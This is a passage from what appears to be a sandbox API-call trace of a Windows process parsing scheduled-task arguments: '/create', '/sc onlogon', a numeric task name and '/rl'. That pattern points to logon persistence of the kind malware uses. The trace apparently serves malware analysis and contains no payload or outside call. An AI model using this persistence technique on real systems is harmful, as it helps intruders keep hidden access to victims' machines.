returned 3 [0157.178] GetThreadLocale () returned 0x409 [0157.178] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.179] lstrlenW (lpString="ec") returned 2 [0157.179] GetThreadLocale () returned 0x409 [0157.179] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.179] lstrlenW (lpString="rl") returned 2 [0157.179] GetThreadLocale () returned 0x409 [0157.179] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.179] lstrlenW (lpString="delay") returned 5 [0157.179] GetThreadLocale () returned 0x409 [0157.179] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.179] lstrlenW (lpString="np") returned 2 [0157.179] SetLastError (dwErrCode=0x0) [0157.179] SetLastError (dwErrCode=0x0) [0157.179] lstrlenW (lpString="/create") returned 7 [0157.179] lstrlenW (lpString="-/") returned 2 [0157.179] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.179] lstrlenW (lpString="create") returned 6 [0157.179] lstrlenW (lpString="create") returned 6 [0157.179] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.179] lstrlenW (lpString="create") returned 6 [0157.179] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.179] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|create|") returned 8 [0157.179] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|create|") returned 8 [0157.179] lstrlenW (lpString="|create|") returned 8 [0157.179] lstrlenW (lpString="|create|") returned 8 [0157.179] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0157.179] SetLastError (dwErrCode=0x0) [0157.179] SetLastError (dwErrCode=0x0) [0157.179] SetLastError (dwErrCode=0x0) [0157.179] lstrlenW (lpString="/sc") returned 3 [0157.180] lstrlenW (lpString="-/") returned 2 [0157.180] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.180] lstrlenW (lpString="create") returned 6 [0157.180] lstrlenW (lpString="create") returned 6 [0157.180] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.180] lstrlenW (lpString="sc") returned 2 [0157.180] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.180] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|create|") returned 8 [0157.180] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.180] lstrlenW (lpString="|create|") returned 8 [0157.180] lstrlenW (lpString="|sc|") returned 4 [0157.180] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0157.180] SetLastError (dwErrCode=0x490) [0157.180] lstrlenW (lpString="?") returned 1 [0157.180] lstrlenW (lpString="?") returned 1 [0157.180] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.180] lstrlenW (lpString="sc") returned 2 [0157.180] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.180] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|?|") returned 3 [0157.180] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.180] lstrlenW (lpString="|?|") returned 3 [0157.180] lstrlenW (lpString="|sc|") returned 4 [0157.180] SetLastError (dwErrCode=0x490) [0157.180] lstrlenW (lpString="s") returned 1 [0157.180] lstrlenW (lpString="s") returned 1 [0157.180] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.181] lstrlenW (lpString="sc") returned 2 [0157.181] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.181] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|s|") returned 3 [0157.181] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.181] lstrlenW (lpString="|s|") returned 3 [0157.181] lstrlenW (lpString="|sc|") returned 4 [0157.181] SetLastError (dwErrCode=0x490) [0157.181] lstrlenW (lpString="u") returned 1 [0157.181] lstrlenW (lpString="u") returned 1 [0157.181] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.181] lstrlenW (lpString="sc") returned 2 [0157.181] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.181] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|u|") returned 3 [0157.181] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.181] lstrlenW (lpString="|u|") returned 3 [0157.181] lstrlenW (lpString="|sc|") returned 4 [0157.181] SetLastError (dwErrCode=0x490) [0157.181] lstrlenW (lpString="p") returned 1 [0157.182] lstrlenW (lpString="p") returned 1 [0157.182] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.182] lstrlenW (lpString="sc") returned 2 [0157.182] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.182] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|p|") returned 3 [0157.182] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.182] lstrlenW (lpString="|p|") returned 3 [0157.182] lstrlenW (lpString="|sc|") returned 4 [0157.182] SetLastError (dwErrCode=0x490) [0157.182] lstrlenW (lpString="ru") returned 2 [0157.182] lstrlenW (lpString="ru") returned 2 [0157.182] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.182] lstrlenW (lpString="sc") returned 2 [0157.182] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.182] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ru|") returned 4 [0157.182] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.182] lstrlenW (lpString="|ru|") returned 4 [0157.182] lstrlenW (lpString="|sc|") returned 4 [0157.182] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0157.182] SetLastError (dwErrCode=0x490) [0157.182] lstrlenW (lpString="rp") returned 2 [0157.182] lstrlenW (lpString="rp") returned 2 [0157.182] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.182] lstrlenW (lpString="sc") returned 2 [0157.182] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.182] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rp|") returned 4 [0157.183] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.183] lstrlenW (lpString="|rp|") returned 4 [0157.183] lstrlenW (lpString="|sc|") returned 4 [0157.183] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0157.183] SetLastError (dwErrCode=0x490) [0157.183] lstrlenW (lpString="sc") returned 2 [0157.183] lstrlenW (lpString="sc") returned 2 [0157.183] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.183] lstrlenW (lpString="sc") returned 2 [0157.183] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.183] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.183] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.183] lstrlenW (lpString="|sc|") returned 4 [0157.183] lstrlenW (lpString="|sc|") returned 4 [0157.183] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0157.183] SetLastError (dwErrCode=0x0) [0157.183] SetLastError (dwErrCode=0x0) [0157.183] lstrlenW (lpString="onlogon") returned 7 [0157.183] lstrlenW (lpString="-/") returned 2 [0157.183] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0157.183] SetLastError (dwErrCode=0x490) [0157.183] SetLastError (dwErrCode=0x490) [0157.183] SetLastError (dwErrCode=0x0) [0157.183] lstrlenW (lpString="onlogon") returned 7 [0157.183] StrChrIW (lpStart="onlogon", wMatch=0x3a) returned 0x0 [0157.183] SetLastError (dwErrCode=0x490) [0157.183] SetLastError (dwErrCode=0x0) [0157.183] GetProcessHeap () returned 0x4b0000 [0157.184] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4d28 [0157.184] _memicmp (_Buf1=0x4c4d28, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.184] lstrlenW (lpString="onlogon") returned 7 [0157.184] GetProcessHeap () returned 0x4b0000 [0157.184] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4cf8 [0157.184] lstrlenW (lpString="onlogon") returned 7 [0157.184] lstrlenW (lpString=" \x09") returned 2 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0157.184] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0157.184] GetLastError () returned 0x0 [0157.184] lstrlenW (lpString="onlogon") returned 7 [0157.184] lstrlenW (lpString="onlogon") returned 7 [0157.184] SetLastError (dwErrCode=0x0) [0157.184] SetLastError (dwErrCode=0x0) [0157.184] lstrlenW (lpString="/tn") returned 3 [0157.184] lstrlenW (lpString="-/") returned 2 [0157.184] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.184] lstrlenW (lpString="create") returned 6 [0157.184] lstrlenW (lpString="create") returned 6 [0157.184] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.184] lstrlenW (lpString="tn") returned 2 [0157.184] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.184] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|create|") returned 8 [0157.185] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.185] lstrlenW (lpString="|create|") returned 8 [0157.185] lstrlenW (lpString="|tn|") returned 4 [0157.185] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0157.185] SetLastError (dwErrCode=0x490) [0157.185] lstrlenW (lpString="?") returned 1 [0157.185] lstrlenW (lpString="?") returned 1 [0157.185] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.185] lstrlenW (lpString="tn") returned 2 [0157.185] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.185] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|?|") returned 3 [0157.185] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.185] lstrlenW (lpString="|?|") returned 3 [0157.185] lstrlenW (lpString="|tn|") returned 4 [0157.185] SetLastError (dwErrCode=0x490) [0157.185] lstrlenW (lpString="s") returned 1 [0157.185] lstrlenW (lpString="s") returned 1 [0157.185] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.185] lstrlenW (lpString="tn") returned 2 [0157.185] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.185] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|s|") returned 3 [0157.185] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.185] lstrlenW (lpString="|s|") returned 3 [0157.185] lstrlenW (lpString="|tn|") returned 4 [0157.185] SetLastError (dwErrCode=0x490) [0157.185] lstrlenW (lpString="u") returned 1 [0157.186] lstrlenW (lpString="u") returned 1 [0157.186] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.186] lstrlenW (lpString="tn") returned 2 [0157.186] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.186] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|u|") returned 3 [0157.186] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.186] lstrlenW (lpString="|u|") returned 3 [0157.186] lstrlenW (lpString="|tn|") returned 4 [0157.186] SetLastError (dwErrCode=0x490) [0157.186] lstrlenW (lpString="p") returned 1 [0157.186] lstrlenW (lpString="p") returned 1 [0157.186] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.186] lstrlenW (lpString="tn") returned 2 [0157.186] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.186] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|p|") returned 3 [0157.186] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.186] lstrlenW (lpString="|p|") returned 3 [0157.186] lstrlenW (lpString="|tn|") returned 4 [0157.186] SetLastError (dwErrCode=0x490) [0157.186] lstrlenW (lpString="ru") returned 2 [0157.186] lstrlenW (lpString="ru") returned 2 [0157.186] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.186] lstrlenW (lpString="tn") returned 2 [0157.186] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.186] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ru|") returned 4 [0157.186] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.187] lstrlenW (lpString="|ru|") returned 4 [0157.187] lstrlenW (lpString="|tn|") returned 4 [0157.187] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0157.187] SetLastError (dwErrCode=0x490) [0157.187] lstrlenW (lpString="rp") returned 2 [0157.187] lstrlenW (lpString="rp") returned 2 [0157.187] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.187] lstrlenW (lpString="tn") returned 2 [0157.187] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.187] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rp|") returned 4 [0157.187] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.187] lstrlenW (lpString="|rp|") returned 4 [0157.187] lstrlenW (lpString="|tn|") returned 4 [0157.187] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0157.187] SetLastError (dwErrCode=0x490) [0157.187] lstrlenW (lpString="sc") returned 2 [0157.187] lstrlenW (lpString="sc") returned 2 [0157.187] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.187] lstrlenW (lpString="tn") returned 2 [0157.187] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.187] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.187] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.187] lstrlenW (lpString="|sc|") returned 4 [0157.187] lstrlenW (lpString="|tn|") returned 4 [0157.187] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0157.187] SetLastError (dwErrCode=0x490) [0157.187] lstrlenW (lpString="mo") returned 2 [0157.188] lstrlenW (lpString="mo") returned 2 [0157.188] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.188] lstrlenW (lpString="tn") returned 2 [0157.188] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.188] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|mo|") returned 4 [0157.188] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.188] lstrlenW (lpString="|mo|") returned 4 [0157.188] lstrlenW (lpString="|tn|") returned 4 [0157.188] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0157.188] SetLastError (dwErrCode=0x490) [0157.188] lstrlenW (lpString="d") returned 1 [0157.188] lstrlenW (lpString="d") returned 1 [0157.188] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.188] lstrlenW (lpString="tn") returned 2 [0157.188] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.188] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|d|") returned 3 [0157.188] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.188] lstrlenW (lpString="|d|") returned 3 [0157.188] lstrlenW (lpString="|tn|") returned 4 [0157.188] SetLastError (dwErrCode=0x490) [0157.188] lstrlenW (lpString="m") returned 1 [0157.188] lstrlenW (lpString="m") returned 1 [0157.188] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.188] lstrlenW (lpString="tn") returned 2 [0157.188] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.189] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|m|") returned 3 [0157.189] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.189] lstrlenW (lpString="|m|") returned 3 [0157.189] lstrlenW (lpString="|tn|") returned 4 [0157.189] SetLastError (dwErrCode=0x490) [0157.189] lstrlenW (lpString="i") returned 1 [0157.189] lstrlenW (lpString="i") returned 1 [0157.189] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.189] lstrlenW (lpString="tn") returned 2 [0157.189] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.189] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|i|") returned 3 [0157.189] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.189] lstrlenW (lpString="|i|") returned 3 [0157.189] lstrlenW (lpString="|tn|") returned 4 [0157.189] SetLastError (dwErrCode=0x490) [0157.189] lstrlenW (lpString="tn") returned 2 [0157.189] lstrlenW (lpString="tn") returned 2 [0157.189] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.189] lstrlenW (lpString="tn") returned 2 [0157.189] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.189] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.189] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.189] lstrlenW (lpString="|tn|") returned 4 [0157.189] lstrlenW (lpString="|tn|") returned 4 [0157.189] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0157.189] SetLastError (dwErrCode=0x0) [0157.189] SetLastError (dwErrCode=0x0) [0157.190] lstrlenW (lpString="2620738370") returned 10 [0157.190] lstrlenW (lpString="-/") returned 2 [0157.190] StrChrIW (lpStart="-/", wMatch=0x32) returned 0x0 [0157.190] SetLastError (dwErrCode=0x490) [0157.190] SetLastError (dwErrCode=0x490) [0157.190] SetLastError (dwErrCode=0x0) [0157.190] lstrlenW (lpString="2620738370") returned 10 [0157.190] StrChrIW (lpStart="2620738370", wMatch=0x3a) returned 0x0 [0157.190] SetLastError (dwErrCode=0x490) [0157.190] SetLastError (dwErrCode=0x0) [0157.190] lstrlenW (lpString="2620738370") returned 10 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] SetLastError (dwErrCode=0x0) [0157.190] lstrlenW (lpString="/rl") returned 3 [0157.190] lstrlenW (lpString="-/") returned 2 [0157.190] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.190] lstrlenW (lpString="create") returned 6 [0157.190] lstrlenW (lpString="create") returned 6 [0157.190] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.190] lstrlenW (lpString="rl") returned 2 [0157.190] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.190] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|create|") returned 8 [0157.190] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.190] lstrlenW (lpString="|create|") returned 8 [0157.190] lstrlenW (lpString="|rl|") returned 4 [0157.190] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0157.190] SetLastError (dwErrCode=0x490) [0157.190] lstrlenW (lpString="?") returned 1 [0157.191] lstrlenW (lpString="?") returned 1 [0157.191] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.191] lstrlenW (lpString="rl") returned 2 [0157.191] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.191] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|?|") returned 3 [0157.191] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.191] lstrlenW (lpString="|?|") returned 3 [0157.191] lstrlenW (lpString="|rl|") returned 4 [0157.191] SetLastError (dwErrCode=0x490) [0157.191] lstrlenW (lpString="s") returned 1 [0157.191] lstrlenW (lpString="s") returned 1 [0157.191] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.191] lstrlenW (lpString="rl") returned 2 [0157.191] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.191] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|s|") returned 3 [0157.191] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.191] lstrlenW (lpString="|s|") returned 3 [0157.191] lstrlenW (lpString="|rl|") returned 4 [0157.191] SetLastError (dwErrCode=0x490) [0157.191] lstrlenW (lpString="u") returned 1 [0157.191] lstrlenW (lpString="u") returned 1 [0157.191] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.191] lstrlenW (lpString="rl") returned 2 [0157.191] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.191] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|u|") returned 3 [0157.191] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.192] lstrlenW (lpString="|u|") returned 3 [0157.192] lstrlenW (lpString="|rl|") returned 4 [0157.192] SetLastError (dwErrCode=0x490) [0157.192] lstrlenW (lpString="p") returned 1 [0157.192] lstrlenW (lpString="p") returned 1 [0157.192] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.192] lstrlenW (lpString="rl") returned 2 [0157.192] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.192] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|p|") returned 3 [0157.192] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.192] lstrlenW (lpString="|p|") returned 3 [0157.192] lstrlenW (lpString="|rl|") returned 4 [0157.192] SetLastError (dwErrCode=0x490) [0157.192] lstrlenW (lpString="ru") returned 2 [0157.192] lstrlenW (lpString="ru") returned 2 [0157.192] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.192] lstrlenW (lpString="rl") returned 2 [0157.192] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.192] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ru|") returned 4 [0157.192] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.192] lstrlenW (lpString="|ru|") returned 4 [0157.192] lstrlenW (lpString="|rl|") returned 4 [0157.192] StrStrIW (lpFirst="|ru|", lpSrch="|rl|") returned 0x0 [0157.192] SetLastError (dwErrCode=0x490) [0157.192] lstrlenW (lpString="rp") returned 2 [0157.192] lstrlenW (lpString="rp") returned 2 [0157.192] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.193] lstrlenW (lpString="rl") returned 2 [0157.193] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.193] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rp|") returned 4 [0157.193] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.193] lstrlenW (lpString="|rp|") returned 4 [0157.193] lstrlenW (lpString="|rl|") returned 4 [0157.193] StrStrIW 